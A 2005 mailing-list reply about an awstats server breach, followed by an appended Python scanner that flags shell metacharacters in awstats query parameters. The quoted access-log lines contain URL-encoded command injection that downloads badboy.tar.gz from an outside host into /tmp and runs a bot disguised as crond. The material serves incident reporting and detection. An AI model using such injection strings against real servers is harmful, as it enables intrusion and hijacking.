Re: Security Breach

On Fri, 04.03.2005 at 17:40, Chris Strzelczyk wrote:

> I just thought I would let you know how my server got compromised.  This
> even happened after I installed the new version of awstats on Wednesday.
> So in short I don't know if it is OK to run awstats as a cgi executable.
> 
> These are from my access log:
> 
>   "GET  
> /cgi-bin/awstats.pl? 
> configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2 
> 0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta 
> r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec 
> ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
> 
>   "GET  
> /cgi-bin/awstats.pl? 
> configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidi 
> lis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20 
> psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b% 
> 2500 HTTP/1.1" 200 634 "-" "-"
> 
> 
> -cs

Thank you for this report.
So you are saying that even with awstats 6.4 you got compromised as
Apache did execute the logged command and a trojan then started running
located in /tmp? If so, would you please be so kind and report that
issue to the awstats project guys as soon as possible?

Alexander


-- 
Alexander Dalloz | Enger, Germany | GPG http://pgp.mit.edu 0xB366A773
legal statement: http://www.uni-x.org/legal.html
Fedora Core 2 GNU/Linux on Athlon with kernel 2.6.10-1.14_FC2smp 
Serendipity 18:32:39 up 11 days, 5:41, load average: 0.20, 0.17, 0.25 

Attachment: signature.asc
Description: This is a digitally signed message part
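
A defensive check for the kind of request quoted in the access log excerpt above, added here as an example and not part of the original thread: it percent-decodes each `awstats.pl` query parameter (repeatedly, so the double-encoded `%2500` surfaces as NUL) and flags shell metacharacters. The function names, the character deny-list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request and status fields of a common/combined-format access log line.
REQUEST_RE = re.compile(r'"[A-Z]+\s+(?P<target>\S+)\s+HTTP/[\d.]+"\s+(?P<status>\d{3})')

# Assumed deny-list: shell metacharacters plus NUL and newline, none of which
# belong in a legitimate awstats parameter value.
SUSPICIOUS = set("|;`$&<>\x00\n")

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double encoding (%2500 -> %00 -> NUL) surfaces."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line, script="awstats.pl"):
    """Return a finding for a request to `script` with suspicious parameters, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/" + script):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = fully_decode(value)
        chars = sorted(set(decoded) & SUSPICIOUS)
        if chars:
            # The status shows the request was served, not that a command ran.
            return {"param": name, "decoded": decoded, "chars": chars,
                    "status": m.group("status")}
    return None

def scan(lines):
    """Collect findings for every line that trips the check."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample lines (documentation addresses, shortened parameter value).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Mar/2005:17:00:01 +0000] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.77 - - [04/Mar/2005:17:00:09 +0000] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20b_exp%3becho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["status"], finding["param"], repr(finding["decoded"]), finding["chars"])
```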

